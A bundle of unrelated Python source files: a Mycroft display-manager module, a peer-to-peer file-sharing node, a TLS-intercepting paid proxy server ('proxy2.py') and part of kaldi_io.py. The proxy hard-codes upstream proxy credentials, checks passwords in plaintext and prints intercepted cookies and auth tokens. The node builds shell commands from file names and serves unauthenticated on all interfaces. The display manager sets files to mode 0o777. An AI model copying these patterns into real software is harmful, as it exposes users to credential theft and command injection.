            # check if file is empty
            if os.stat(str(dispFile.name)).st_size != 0:
                data = json.load(dispFile)
            else:
                data = {}
                LOG.info("Display Manager is creating " + dispFile.name)
            for key in dictionary:
                data[key] = dictionary[key]
            dispFile.seek(0)
            dispFile.write(json.dumps(data))
            dispFile.truncate()
            os.chmod(path, 0o777)
    except Exception as e:
        LOG.error(e)
        LOG.error("Error found in display manager file, deleting...")
        os.remove(path)
        # Retry once the corrupt file is deleted.
        # NOTE(review): this recurses unboundedly if the error persists —
        # consider a retry cap.
        _write_data(dictionary)
def _read_data():
    """ Reads the file in (/tmp/mycroft/ipc/managers/disp_info)
    and returns the the data as python dict
    """
    managerIPCDir = os.path.join(get_ipc_directory(), "managers")

    path = os.path.join(managerIPCDir, "disp_info")
    permission = "r" if os.path.isfile(path) else "w+"

    if permission == "w+" and os.path.isdir(managerIPCDir) is False:
        os.makedirs(managerIPCDir)

    data = {}
    try:
        with open(path, permission) as dispFile:
            if os.stat(str(dispFile.name)).st_size != 0:
                data = json.load(dispFile)
    except Exception as e:
        LOG.error(e)
        os.remove(path)
        # Fix: the retry's result was previously discarded, so a corrupt
        # file always yielded {}; return the re-read data instead.
        data = _read_data()
    return data
def set_active(skill_name):
    """Record `skill_name` as the active skill in the display manager.

    args:
        string: skill_name
    """
    _write_data({"active_skill": skill_name})
def get_active():
    """Return the active skill recorded by the display manager ("" if none)."""
    data = _read_data()
    return data.get("active_skill", "")
def remove_active():
    """Clear the active skill in the display manager."""
    LOG.debug("Removing active skill...")
    _write_data({"active_skill": ""})
def initiate_display_manager_ws():
    """ Initiates the web sockets on the display_manager
    """
    LOG.info("Initiating display manager websocket")

    # Should remove needs to be an object so it can be referenced in functions
    # [https://stackoverflow.com/questions/986006/how-do-i-pass-a-variable-by-reference]
    should_remove = [True]

    def check_flag(flag):
        # Clear the active skill only if no new audio started meanwhile.
        if flag[0] is True:
            remove_active()

    def set_delay(event=None):
        # Audio output ended: schedule clearing the active skill after 2 s.
        should_remove[0] = True
        Timer(2, check_flag, [should_remove]).start()

    def set_remove_flag(event=None):
        # Audio output started again: cancel any pending clear.
        should_remove[0] = False

    def connect():
        ws.run_forever()

    def remove_wake_word():
        # Drop the "wakeword" marker if it is still the active skill.
        data = _read_data()
        if "active_skill" in data and data["active_skill"] == "wakeword":
            remove_active()

    def set_wakeword_skill(event=None):
        # Mark the wakeword as active, then drop it again after 10 s.
        set_active("wakeword")
        Timer(10, remove_wake_word).start()

    ws = WebsocketClient()
    ws.on('recognizer_loop:audio_output_end', set_delay)
    ws.on('recognizer_loop:audio_output_start', set_remove_flag)
    ws.on('recognizer_loop:record_begin', set_wakeword_skill)

    # Daemon thread so the websocket loop never blocks process shutdown.
    event_thread = Thread(target=connect)
    event_thread.setDaemon(True)
    event_thread.start()
|
node.py | from threading import Thread
import client as cl
import storage
import socket
import utils
import json
import time
import os
class Node:
    """Peer-to-peer file-sharing node: serves a small line protocol on
    port `inbound` and syncs the contents of .shares/ and received/."""

    inbound = 2424

    def __init__(self, peers):
        self.pool = peers
        # Dispatch table: protocol verb -> handler (bound methods captured
        # BEFORE self.uptime below shadows the uptime() method).
        self.actions = {'AddPeer': self.add_peer,
                        'HashVal': self.hashdump,
                        'Uptime': self.uptime}
        self.memory = self.check_memory()
        self.hostname = os.getlogin()
        self.os = os.name
        # Fix: uptime() reads self.start, which was never initialized and
        # raised AttributeError on the first Uptime request.
        self.start = time.time()
        self.uptime = 0.0
        self.running = True
        # get file hashes of shares
        self.shares = self.setup_shares()
        serve = Thread(target=self.run_backend, args=())
        # daemon=True (modern spelling of the deprecated setDaemon(True))
        serve.daemon = True
        serve.start()

    def check_memory(self):
        """Parse `free --kilo` output into a {label: value} dict."""
        free_mem = utils.cmd('free --kilo', False)
        mem_labels = free_mem[0]
        mem_labels = list(filter(None, mem_labels.split(' ')))
        mem_free = list(filter(None, free_mem[1].split(' ')))
        mem_free.pop(0)
        memory_data = {}
        i = 0
        for label in mem_labels:
            memory_data[label] = mem_free[i]
            i += 1
        return memory_data

    def set_uptime(self, new_dt):
        """Record the most recently computed uptime value (seconds)."""
        self.uptime = new_dt

    def setup_shares(self):
        """Hash every file under received/ and .shares/; return {path: sha256}."""
        hashes = {}
        if not os.path.isdir('.shares/'):
            os.mkdir('.shares')
        if not os.path.isdir('received'):
            os.mkdir('received')
        else:
            # os.system('mv received/* .shares/')
            for f in os.listdir('received/'):
                fn = '%s/received/%s' % (os.getcwd(), f)
                fhash = utils.cmd('sha256sum %s' % fn, False).pop().split(' ')[0]
                hashes[fn] = fhash
        for fl in os.listdir('.shares'):
            fn = '%s/.shares/%s' % (os.getcwd(), fl)
            fhash = utils.cmd('sha256sum %s' % fn, False).pop().split(' ')[0]
            hashes[fn] = fhash
        return hashes

    def update_shares(self):
        """Re-scan the share directories and report the new count."""
        self.shares = self.setup_shares()
        print('[-] %d shared files ' % len(self.shares.keys()))

    def run_backend(self):
        """Accept-loop of the backend server; runs until self.running is False."""
        print('[-] Backend Server Listening on 0.0.0.0:%d' % self.inbound)
        s = utils.create_listener(self.inbound)
        iteration = 0
        try:
            while self.running:
                try:
                    c, i = s.accept()
                    c = self.handler(c, i)
                    c.close()
                    # update shares
                    self.shares = self.setup_shares()
                    # check if peers have the same shares
                except socket.error:
                    print('[!!] Connection error with %s')
                iteration += 1
        except KeyboardInterrupt:
            self.running = False

    def add_peer(self, sock, args):
        """AddPeer action: register args[0] in the pool if it is new."""
        addr = args[0]
        if addr not in self.pool:
            self.pool.append(addr)
            print('[+] Added peer %s' % addr)
            sock.send(b'[+] Peer Added')
        else:
            sock.send(b'[x] Peer is known')
        return sock

    def uptime(self, sock, args):
        """Uptime action: report seconds elapsed since construction."""
        dt = time.time() - self.start
        ut = '[-] Uptime: %d seconds' % dt
        sock.send(ut.encode('utf-8'))
        self.set_uptime(dt)
        return sock

    def hashdump(self, sock, args):
        """HashVal action: send the share table as JSON bytes."""
        hdata = json.dumps(self.shares).encode('utf-8')
        sock.send(hdata)
        return sock

    def distribute_shared_files(self):
        """Compare hashes with every peer and push local shares around."""
        for peer in self.pool:
            # Get files from this peer
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.connect((peer, 2424))
            s.send(b'HashVal :::: null')
            try:
                rmt_files = json.loads(s.recv(2048))
            except ValueError:
                rmt_files = {}
            for rf in rmt_files:
                rhash = rmt_files[rf]
                if rhash not in self.shares.values():
                    print('[o] %s has a file I dont [%s]' % (peer, rf))
            for file in self.shares.keys():
                recipient = storage.distribute(file, self.pool)
                cl.send_file(file, recipient, 4242)
            s.close()

    def handler(self, c, i):
        """Parse one '<verb> :::: <csv-args>' request and dispatch it."""
        request = c.recv(1024).decode('utf-8')
        try:
            api_req = request.split(' :::: ')[0]
            params = request.split(' :::: ')[1].split(',')
            if api_req in self.actions.keys():
                c = self.actions[api_req](c, params)
        except IndexError:
            pass
        return c
proxy2.py | # -*- coding: utf-8 -*-
import sys
import os
import socket
import ssl
import select
import httplib
import base64
import urlparse
import threading
import gzip
import zlib
import time
import json
import re
import traceback
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
from SocketServer import ThreadingMixIn
from cStringIO import StringIO
from subprocess import Popen, PIPE
from HTMLParser import HTMLParser
from multiprocessing import Process
import multiprocessing
import database
from database import User
# Map of local listening port -> upstream proxy spec "host:port:user:password".
# NOTE(review): credentials are hard-coded in source — move them into an
# environment variable or a config file outside version control.
route_table = {
    20000: 'ca.smartproxy.com:20000:rycao18:Unknown',
    20001: 'us.smartproxy.com:10000:rycao18:Unknown',
    20002: 'ca.smartproxy.com:20000:rycao18:Unknown',
    20003: 'us.smartproxy.com:10000:rycao18:Unknown',
    20004: 'ca.smartproxy.com:20000:rycao18:Unknown',
    20005: 'us.smartproxy.com:10000:rycao18:Unknown',
    20006: 'ca.smartproxy.com:20000:rycao18:Unknown',
    20007: 'us.smartproxy.com:10000:rycao18:Unknown',
    20008: 'ca.smartproxy.com:20000:rycao18:Unknown',
    20009: 'us.smartproxy.com:10000:rycao18:Unknown',
    20010: 'ca.smartproxy.com:20000:rycao18:Unknown',
    20011: 'us.smartproxy.com:10000:rycao18:Unknown',
    20012: "proxy.spider.com:8080:berkeley-Unknown-country-us:Rycaorec"
}

# Shared session state; 'test' looks like a placeholder entry.
mysession = {
    'table': route_table,
    'test': 'test'
}
def with_color(c, s):
    """Wrap `s` in the ANSI escape sequence for color code `c`."""
    reset = "\x1b[0m"
    return "\x1b[%dm%s" % (c, s) + reset
def join_with_script_dir(path):
    """Resolve `path` relative to the directory containing this script."""
    script_dir = os.path.dirname(os.path.abspath(__file__))
    return os.path.join(script_dir, path)
class ThreadingHTTPServer(ThreadingMixIn, HTTPServer):
    """HTTP server that handles each request in its own daemon thread."""
    address_family = socket.AF_INET
    daemon_threads = True

    def handle_error(self, request, client_address):
        """Suppress socket/ssl noise; delegate everything else to the base."""
        exc_cls = sys.exc_info()[0]
        if exc_cls is socket.error or exc_cls is ssl.SSLError:
            return
        return HTTPServer.handle_error(self, request, client_address)
class ProxyRequestHandler(BaseHTTPRequestHandler):
    # CA key/cert used to mint per-host certificates for TLS interception.
    cakey = join_with_script_dir('ca.key')
    cacert = join_with_script_dir('ca.crt')
    # cakey = join_with_script_dir('privkey.pem')
    # cacert = join_with_script_dir('fullchain.pem')
    certkey = join_with_script_dir('cert.key')
    certdir = join_with_script_dir('certs/')
    timeout = 30
    lock = threading.Lock()
    # NOTE(review): process_lock/ScopedSession look like they are injected by
    # the server bootstrap before handling starts — confirm.
    process_lock = None
    ScopedSession = None
    # Upstream proxy defaults; overwritten per-request by init_ProxyInfo().
    proxy_ip, proxy_port, proxy_username, proxy_password = ('', '', '', '')
    def __init__(self, *args, **kwargs):
        # Per-thread state must be set BEFORE calling the base constructor:
        # BaseHTTPRequestHandler.__init__ processes the request immediately,
        # so anything assigned after it runs too late.
        self.tls = threading.local()
        self.tls.conns = {}  # cache of upstream connections per origin
        self.username = None
        BaseHTTPRequestHandler.__init__(self, *args, **kwargs)
        # self.proxy_host = "ca.smartproxy.com"
        # self.proxy_port = 20000
        # self.proxy_username = 'rycao18'
        # self.proxy_password = 'Unknown'
def log_error(self, format, *args):
# surpress "Request timed out: timeout('timed out',)"
if isinstance(args[0], socket.timeout):
return
self.log_message(format, *args)
def do_AUTHHEAD(self):
print("send header")
self.send_response(407)
self.send_header('Proxy-Authenticate', 'Basic realm=\"Test\"')
self.send_header('Content-type', 'text/html')
self.end_headers()
def do_Authentication(self, auth_header, session):
print(auth_header)
self.user = None
auth_values = auth_header.split(' ')
if auth_values[0] != 'Basic':
return False
auth_key = auth_values[1]
username, pwd = base64.decodestring(auth_key).split(':')
user = session.query(User).filter(User.username == username, User.password == pwd).first()
print(user)
self.user = user
if user is None:
return False
return True
def init_ProxyInfo(self):
port_number = self.server.server_port
proxy_parts = route_table[port_number].split(':')
print(proxy_parts)
self.proxy_ip = str(proxy_parts[0])
self.proxy_port = int(proxy_parts[1])
self.proxy_username = str(proxy_parts[2])
self.proxy_password = str(proxy_parts[3])
def do_CONNECT(self):
self.init_ProxyInfo()
print("DO CONNECT Proxy Authorization Headers ", self.headers.getheader('Proxy-Authorization'))
session = self.ScopedSession()
if self.headers.getheader('Proxy-Authorization') is None:
self.do_AUTHHEAD()
self.wfile.write('no auth header received')
self.wfile.write('\r\n\r\n')
self.wfile.flush()
return
elif not self.do_Authentication(self.headers.getheader('Proxy-Authorization'), session):
self.do_AUTHHEAD()
self.wfile.write(self.headers.getheader('Proxy-Authorization'))
self.wfile.write('Not Authenticated')
self.wfile.write('\r\n\r\n')
self.wfile.flush()
self.ScopedSession.remove()
return
# self.ScopedSession.remove()
if os.path.isfile(self.cakey) and os.path.isfile(self.cacert) and os.path.isfile(self.certkey) and os.path.isdir(self.certdir):
self.connect_intercept()
else:
self.connect_relay()
def connect_intercept(self):
hostname = self.path.split(':')[0]
certpath = "%s/%s.crt" % (self.certdir.rstrip('/'), hostname)
# with self.lock:
# if not os.path.isfile(certpath):
# epoch = "%d" % (time.time() * 1000)
# p1 = Popen(["openssl", "req", "-new", "-key", self.certkey, "-subj", "/CN=%s" % hostname], stdout=PIPE)
# p2 = Popen(["openssl", "x509", "-req", "-days", "3650", "-CA", self.cacert, "-CAkey", self.cakey, "-set_serial", epoch, "-out", certpath], stdin=p1.stdout, stderr=PIPE)
# p2.communicate()
self.wfile.write("%s %d %s\r\n" % (self.protocol_version, 200, 'Connection Established'))
self.end_headers()
# self.connection = ssl.wrap_socket(self.connection, keyfile=self.certkey, certfile=certpath, server_side=True)
self.connection = ssl.wrap_socket(self.connection, keyfile=self.cakey, certfile=self.cacert, server_side=True)
self.rfile = self.connection.makefile("rb", self.rbufsize)
self.wfile = self.connection.makefile("wb", self.wbufsize)
conntype = self.headers.get('Proxy-Connection', '')
if self.protocol_version == "HTTP/1.1" and conntype.lower() != 'close':
self.close_connection = 0
else:
self.close_connection = 1
def connect_relay(self):
session = self.ScopedSession()
address = self.path.split(':', 1)
address[1] = int(address[1]) or 443
auth = '%s:%s' % (self.proxy_username, self.proxy_password)
self.headers['Proxy-Authorization'] = 'Basic ' + base64.b64encode(auth)
raw_data = self.raw_requestline + str(self.headers) + "\r\n"
print(raw_data)
try:
address = (self.proxy_ip,self.proxy_port)
s = socket.create_connection(address, timeout=self.timeout)
s.sendall(raw_data)
result = s.recv(8192)
self.connection.sendall(result)
except Exception as e:
self.send_error(502)
return
# self.send_response(200, 'Connection Established')
# self.end_headers()
conns = [self.connection, s]
self.close_connection = 0
streamed_bytes = 0
while not self.close_connection:
rlist, wlist, xlist = select.select(conns, [], conns, self.timeout)
if xlist or not rlist:
break
for r in rlist:
other = conns[1] if r is conns[0] else conns[0]
data = r.recv(8192)
streamed_bytes += len(data)
if not data:
self.close_connection = 1
break
other.sendall(data)
with self.lock:
if self.user:
print("=final")
print(streamed_bytes)
session.query(User).filter(User.username == self.user.username).update(
{User.data_usage: User.data_usage + streamed_bytes})
session.commit()
self.ScopedSession.remove()
def end_handle_request(self):
self.close_connection = 1
self.ScopedSession.remove()
def do_GET(self):
self.init_ProxyInfo()
print("========= Do Get Authorization Headers ============", self.headers.getheader('Proxy-Authorization'))
print(self.path)
if self.path == 'http://proxy2.test/':
self.send_cacert()
return
print(self.ScopedSession)
session = self.ScopedSession()
if not isinstance(self.connection, ssl.SSLSocket):
# Proxy Authentication Part
if self.headers.getheader('Proxy-Authorization') is None:
self.do_AUTHHEAD()
self.wfile.write('no auth header received')
self.wfile.flush()
self.end_handle_request()
return
elif not self.do_Authentication(self.headers.getheader('Proxy-Authorization'), session):
self.do_AUTHHEAD()
self.wfile.write(self.headers.getheader('Proxy-Authorization'))
self.wfile.write('Not Authenticated')
self.wfile.flush()
self.end_handle_request()
return
req = self
content_length = int(req.headers.get('Content-Length', 0))
req_body = self.rfile.read(content_length) if content_length else None
if req.path[0] == '/':
if isinstance(self.connection, ssl.SSLSocket):
req.path = "https://%s%s" % (req.headers['Host'], req.path)
else:
req.path = "http://%s%s" % (req.headers['Host'], req.path)
req_body_modified = self.request_handler(req, req_body)
if req_body_modified is False:
self.send_error(403)
self.end_handle_request()
return
elif req_body_modified is not None:
req_body = req_body_modified
req.headers['Content-length'] = str(len(req_body))
u = urlparse.urlsplit(req.path)
scheme, netloc, path = u.scheme, u.netloc, (u.path + '?' + u.query if u.query else u.path)
assert scheme in ('http', 'https')
if netloc:
req.headers['Host'] = netloc
setattr(req, 'headers', self.filter_headers(req.headers))
try:
origin = (scheme, netloc)
auth = '%s:%s' % (self.proxy_username, self.proxy_password)
req.headers['Proxy-Authorization'] = 'Basic ' + base64.b64encode(auth)
if not origin in self.tls.conns:
if scheme == 'https':
self.tls.conns[origin] = httplib.HTTPSConnection(self.proxy_ip, self.proxy_port, timeout=self.timeout)
self.tls.conns[origin].set_tunnel(netloc, headers={'Proxy-Authorization': req.headers['Proxy-Authorization']})
# self.tls.conns[origin] = httplib.HTTPSConnection(netloc, timeout=self.timeout)
else:
self.tls.conns[origin] = httplib.HTTPConnection(self.proxy_ip, self.proxy_port, timeout=self.timeout)
# self.tls.conns[origin].set_tunnel(netloc,headers={'Proxy-Authorization':req.headers['Proxy-Authorization']});
# self.tls.conns[origin] = httplib.HTTPConnection(netloc, timeout=self.timeout)
conn = self.tls.conns[origin]
if scheme == 'https':
conn.request(self.command, path, req_body, dict(req.headers))
else:
conn.request(self.command, req.path, req_body, dict(req.headers))
res = conn.getresponse()
version_table = {10: 'HTTP/1.0', 11: 'HTTP/1.1'}
setattr(res, 'headers', res.msg)
setattr(res, 'response_version', version_table[res.version])
# support streaming
if not 'Content-Length' in res.headers and 'no-store' in res.headers.get('Cache-Control', ''):
self.response_handler(req, req_body, res, '')
setattr(res, 'headers', self.filter_headers(res.headers))
streamed_bytes = self.relay_streaming(res)
with self.lock:
if self.user:
self.user.data_usage = self.user.data_usage + streamed_bytes
session.commit()
self.save_handler(req, req_body, res, '')
self.end_handle_request()
return
res_body = res.read()
except Exception as e:
if origin in self.tls.conns:
del self.tls.conns[origin]
self.send_error(502)
# self.close_connection = 1
traceback.print_exc()
self.end_handle_request()
return
content_encoding = res.headers.get('Content-Encoding', 'identity')
res_body_plain = self.decode_content_body(res_body, content_encoding)
res_body_modified = self.response_handler(req, req_body, res, res_body_plain)
if res_body_modified is False:
self.send_error(403)
# self.close_connection = 1
self.end_handle_request()
return
elif res_body_modified is not None:
res_body_plain = res_body_modified
res_body = self.encode_content_body(res_body_plain, content_encoding)
res.headers['Content-Length'] = str(len(res_body))
setattr(res, 'headers', self.filter_headers(res.headers))
self.wfile.write("%s %d %s\r\n" % (self.protocol_version, res.status, res.reason))
for line in res.headers.headers:
self.wfile.write(line)
self.end_headers()
self.wfile.write(res_body)
self.wfile.flush()
with self.lock:
# print("=============user===========")
# print(self.user)
# print(len(res_body))
if self.user:
# print("===== add the data usage data")
# print(self.user.data_usage)
session.query(User).filter(User.username == self.user.username).update(
{User.data_usage: User.data_usage + len(res_body)})
# self.user.data_usage = self.user.data_usage + len(res_body)
# print(self.user.data_usage)
session.commit()
self.save_handler(req, req_body, res, res_body_plain)
print("===========Do Get End Response==========")
self.end_handle_request()
def relay_streaming(self, res):
streamed_bytes = 0
self.wfile.write("%s %d %s\r\n" % (self.protocol_version, res.status, res.reason))
for line in res.headers.headers:
self.wfile.write(line)
self.end_headers()
try:
while True:
chunk = res.read(8192)
if not chunk:
break
streamed_bytes = streamed_bytes + len(chunk)
self.wfile.write(chunk)
self.wfile.flush()
except socket.error:
# connection closed by client
pass
return streamed_bytes
do_HEAD = do_GET
do_POST = do_GET
do_PUT = do_GET
do_DELETE = do_GET
do_OPTIONS = do_GET
def filter_headers(self, headers):
# http://tools.ietf.org/html/rfc2616#section-13.5.1
hop_by_hop = ('connection', 'keep-alive', 'proxy-authenticate',
'proxy-authorization', 'te', 'trailers', 'transfer-encoding', 'upgrade')
for k in hop_by_hop:
del headers[k]
# accept only supported encodings
if 'Accept-Encoding' in headers:
ae = headers['Accept-Encoding']
filtered_encodings = [x for x in re.split(r',\s*', ae) if x in ('identity', 'gzip', 'x-gzip', 'deflate')]
headers['Accept-Encoding'] = ', '.join(filtered_encodings)
return headers
def encode_content_body(self, text, encoding):
if encoding == 'identity':
data = text
elif encoding in ('gzip', 'x-gzip'):
io = StringIO()
with gzip.GzipFile(fileobj=io, mode='wb') as f:
f.write(text)
data = io.getvalue()
elif encoding == 'deflate':
data = zlib.compress(text)
else:
raise Exception("Unknown Content-Encoding: %s" % encoding)
return data
def decode_content_body(self, data, encoding):
if encoding == 'identity':
text = data
elif encoding in ('gzip', 'x-gzip'):
io = StringIO(data)
with gzip.GzipFile(fileobj=io) as f:
text = f.read()
elif encoding == 'deflate':
try:
text = zlib.decompress(data)
except zlib.error:
text = zlib.decompress(data, -zlib.MAX_WBITS)
else:
raise Exception("Unknown Content-Encoding: %s" % encoding)
return text
def send_cacert(self):
with open(self.cacert, 'rb') as f:
data = f.read()
self.wfile.write("%s %d %s\r\n" % (self.protocol_version, 200, 'OK'))
self.send_header('Content-Type', 'application/x-x509-ca-cert')
self.send_header('Content-Length', len(data))
self.send_header('Connection', 'close')
self.end_headers()
self.wfile.write(data)
def print_info(self, req, req_body, res, res_body):
return
def parse_qsl(s):
return '\n'.join("%-20s %s" % (k, v) for k, v in urlparse.parse_qsl(s, keep_blank_values=True))
req_header_text = "%s %s %s\n%s" % (req.command, req.path, req.request_version, req.headers)
res_header_text = "%s %d %s\n%s" % (res.response_version, res.status, res.reason, res.headers)
print with_color(33, req_header_text)
u = urlparse.urlsplit(req.path)
if u.query:
query_text = parse_qsl(u.query)
print with_color(32, "==== QUERY PARAMETERS ====\n%s\n" % query_text)
cookie = req.headers.get('Cookie', '')
if cookie:
cookie = parse_qsl(re.sub(r';\s*', '&', cookie))
print with_color(32, "==== COOKIE ====\n%s\n" % cookie)
auth = req.headers.get('Authorization', '')
if auth.lower().startswith('basic'):
token = auth.split()[1].decode('base64')
print with_color(31, "==== BASIC AUTH ====\n%s\n" % token)
if req_body is not None:
req_body_text = None
content_type = req.headers.get('Content-Type', '')
if content_type.startswith('application/x-www-form-urlencoded'):
req_body_text = parse_qsl(req_body)
elif content_type.startswith('application/json'):
try:
json_obj = json.loads(req_body)
json_str = json.dumps(json_obj, indent=2)
if json_str.count('\n') < 50:
req_body_text = json_str
else:
lines = json_str.splitlines()
req_body_text = "%s\n(%d lines)" % ('\n'.join(lines[:50]), len(lines))
except ValueError:
req_body_text = req_body
elif len(req_body) < 1024:
req_body_text = req_body
if req_body_text:
print with_color(32, "==== REQUEST BODY ====\n%s\n" % req_body_text)
print with_color(36, res_header_text)
cookies = res.headers.getheaders('Set-Cookie')
if cookies:
cookies = '\n'.join(cookies)
print with_color(31, "==== SET-COOKIE ====\n%s\n" % cookies)
if res_body is not None:
res_body_text = None
content_type = res.headers.get('Content-Type', '')
if content_type.startswith('application/json'):
try:
json_obj = json.loads(res_body)
json_str = json.dumps(json_obj, indent=2)
if json_str.count('\n') < 50:
res_body_text = json_str
else:
lines = json_str.splitlines()
res_body_text = "%s\n(%d lines)" % ('\n'.join(lines[:50]), len(lines))
except ValueError:
res_body_text = res_body
elif content_type.startswith('text/html'):
m = re.search(r'<title[^>]*>\s*([^<]+?)\s*</title>', res_body, re.I)
if m:
h = HTMLParser()
print with_color(32, "==== HTML TITLE ====\n%s\n" % h.unescape(m.group(1).decode('utf-8')))
elif content_type.startswith('text/') and len(res_body) < 1024:
res_body_text = res_body
if res_body_text:
print with_color(32, "==== RESPONSE BODY ====\n%s\n" % res_body_text)
def request_handler(self, req, req_body):
pass
def response_handler(self, req, req_body, res, res_body):
pass
def save_handler(self, req, req_body, res, res_body):
self.print_info(req, req_body, res, res_body)
def test(HandlerClass=ProxyRequestHandler, ServerClass=ThreadingHTTPServer, protocol="HTTP/1.1"):
    """Run a single proxy server in the foreground.

    Port comes from sys.argv[1] when given, else 8080. Blocks forever.
    (Python 2 only: uses the print statement.)
    """
    if sys.argv[1:]:
        port = int(sys.argv[1])
    else:
        port = 8080
    server_address = ('', port)
    HandlerClass.protocol_version = protocol
    httpd = ServerClass(server_address, HandlerClass)
    sa = httpd.socket.getsockname()
    print "Serving HTTP Proxy on", sa[0], "port", sa[1], "..."
    httpd.serve_forever()
def run_server(port, lock, database_url, HandlerClass=ProxyRequestHandler, ServerClass=ThreadingHTTPServer, protocol="HTTP/1.1", ):
    """Worker-process entry point: bind one proxy server on *port* and
    serve forever, with its own DB scoped-session bound to *database_url*.

    *lock* is a multiprocessing.Lock used only to serialize console output
    across worker processes.
    """
    scoped_session = None
    try:
        server_address = ('', port)
        HandlerClass.protocol_version = protocol
        # NOTE(review): the `database` module is used here, but only
        # `from database import User` is visible at the top of this file --
        # confirm there is also an `import database`.
        status, ret_scoped_session = database.init(database_url)
        if not status:
            return
        scoped_session = ret_scoped_session
        HandlerClass.ScopedSession = ret_scoped_session
        HandlerClass.process_lock = lock
        httpd = ServerClass(server_address, HandlerClass)
        sa = httpd.socket.getsockname()
        lock.acquire()
        print "Serving HTTP Proxy on", sa[0], "port", sa[1], "...", '\n'
        lock.release()
        httpd.serve_forever()
        # NOTE(review): unreachable in practice -- serve_forever() only
        # returns after an explicit shutdown().
        database.session.close()
    except Exception as e:
        lock.acquire()
        print(e)
        lock.release()
        traceback.print_exc()
def RunMultiProcess():
    """Read init.json, merge its RouteTable into the module route_table,
    and spawn one proxy-server process per configured port; blocks until
    all children exit."""
    global route_table, mysession
    init_json = None
    try:
        with open('init.json', 'r') as f:
            init_json = json.load(f)
    except Exception as e:
        print("Loading Init Data Failed")
        print(e)
    else:
        database_url = init_json['DataBaseUrl']
        # Sanity-check DB connectivity once in the parent before forking.
        status, ret_scoped_session = database.init(database_url)
        if not status:
            return
        ret_scoped_session.remove()
        l = multiprocessing.Lock()
        process = []
        for port in init_json['RouteTable']:
            # JSON keys are strings; route_table is keyed by int port.
            route_table[int(port)] = init_json['RouteTable'][port]
            # NOTE(review): `Process` is used unqualified -- confirm
            # `from multiprocessing import Process` at the top of the file.
            p = Process(target=run_server, args=(int(port), l, database_url))
            process.append(p)
            p.start()
        for p in process:
            p.join()
        # p = Process(target=run_server, args=(20000, l))
        # p.start()
        # p1 = Process(target=run_server, args=(20001, l))
        # p1.start()
        # p2 = Process(target=run_server, args=(20002, l))
        # p2.start()
        # p3 = Process(target=run_server, args=(20003, l))
        # p3.start()
        # p4 = Process(target=run_server, args=(20004, l))
        # p4.start()
        # p5 = Process(target=run_server, args=(20005, l))
        # p5.start()
        # p6 = Process(target=run_server, args=(20006, l))
        # p6.start()
        # p7 = Process(target=run_server, args=(20007, l))
        # p7.start()
        # p8 = Process(target=run_server, args=(20008, l))
        # p8.start()
        # p9 = Process(target=run_server, args=(20009, l))
        # p9.start()
        # p10 = Process(target=run_server, args=(20010, l))
        # p10.start()
if __name__ == '__main__':
    # Entry point: spawn one server process per port from init.json.
    # test()
    RunMultiProcess()
    # if sys.argv[1:]:
    #     port = int(sys.argv[1])
    # else:
    #     port = 8080
    # l = multiprocessing.Lock()
    # run_server(port, l, "sqlite:///D:\\DOWNLOAD\\Employers\\Richard\\proxy-admin\\proxyAdmin\\db.sqlite3" )
    # run_server(port = 20001)
|
kaldi_io.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 2014-2016 Brno University of Technology (author: Karel Vesely)
# Licensed under the Apache License, Version 2.0 (the "License")
import numpy as np
import sys, os, re, gzip, struct

#################################################
# Adding kaldi tools to shell path,

# Select kaldi,
if not 'KALDI_ROOT' in os.environ:
    # Default! To change run python with 'export KALDI_ROOT=/some_dir python'
    os.environ['KALDI_ROOT']='/mnt/matylda5/iveselyk/Tools/kaldi-trunk'

# Add kaldi tools to path,
# NOTE: expands $KALDI_ROOT by echoing through a shell; assumes a POSIX shell.
os.environ['PATH'] = os.popen('echo $KALDI_ROOT/src/bin:$KALDI_ROOT/tools/openfst/bin:$KALDI_ROOT/src/fstbin/:$KALDI_ROOT/src/gmmbin/:$KALDI_ROOT/src/featbin/:$KALDI_ROOT/src/lm/:$KALDI_ROOT/src/sgmmbin/:$KALDI_ROOT/src/sgmm2bin/:$KALDI_ROOT/src/fgmmbin/:$KALDI_ROOT/src/latbin/:$KALDI_ROOT/src/nnetbin:$KALDI_ROOT/src/nnet2bin:$KALDI_ROOT/src/nnet3bin:$KALDI_ROOT/src/online2bin/:$KALDI_ROOT/src/ivectorbin/:$KALDI_ROOT/src/lmbin/').readline().strip() + ':' + os.environ['PATH']
#################################################
# Define all custom exceptions,
# One small exception type per failure mode of the kaldi-format readers/writers.
class UnsupportedDataType(Exception): pass
class UnknownVectorHeader(Exception): pass
class UnknownMatrixHeader(Exception): pass
class BadSampleSize(Exception): pass
class BadInputFormat(Exception): pass
class SubprocessFailed(Exception): pass
#################################################
# Data-type independent helper functions,
def open_or_fd(file, mode='rb'):
    """ fd = open_or_fd(file)
    Open file, gzipped file, pipe, or forward the file-descriptor.
    Eventually seeks, if the 'file' argument contains a ':offset' suffix.
    """
    offset = None
    try:
        # strip 'ark:' / 'scp:' prefix (with read/write options) from
        # r{x,w}filename (optional),
        if re.search(r'^(ark|scp)(,scp|,b|,t|,n?f|,n?p|,b?o|,n?s|,n?cs)*:', file):
            (prefix, file) = file.split(':', 1)
        # separate offset from filename (optional),
        if re.search(r':[0-9]+$', file):
            (file, offset) = file.rsplit(':', 1)
        # input pipe?
        if file[-1] == '|':
            fd = popen(file[:-1], 'rb')  # custom,
        # output pipe?
        elif file[0] == '|':
            fd = popen(file[1:], 'wb')  # custom,
        # is it gzipped?
        elif file.split('.')[-1] == 'gz':
            fd = gzip.open(file, mode)
        # a normal file...
        else:
            fd = open(file, mode)
    except TypeError:
        # 'file' is an already-opened file descriptor; forward it unchanged.
        fd = file
    # Eventually seek to offset,
    if offset is not None:
        fd.seek(int(offset))
    return fd
# based on '/usr/local/lib/python3.4/os.py'
def popen(cmd, mode="rb"):
    """Run *cmd* through the shell and return a file object wired to its
    stdout (read modes) or stdin (write modes).

    Modes 'r'/'w' yield text streams, 'rb'/'wb' raw binary streams.
    A watcher thread reaps the child and raises SubprocessFailed if it
    exits with a non-zero status.
    """
    if not isinstance(cmd, str):
        raise TypeError("invalid cmd type (%s, expected string)" % type(cmd))
    import subprocess, io, threading

    # cleanup function for subprocesses,
    def cleanup(proc, cmd):
        ret = proc.wait()
        if ret > 0:
            raise SubprocessFailed('cmd %s returned %d !' % (cmd, ret))
        return

    text = mode in ("r", "w")
    if mode in ("r", "rb"):
        proc = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)
        stream = proc.stdout
    elif mode in ("w", "wb"):
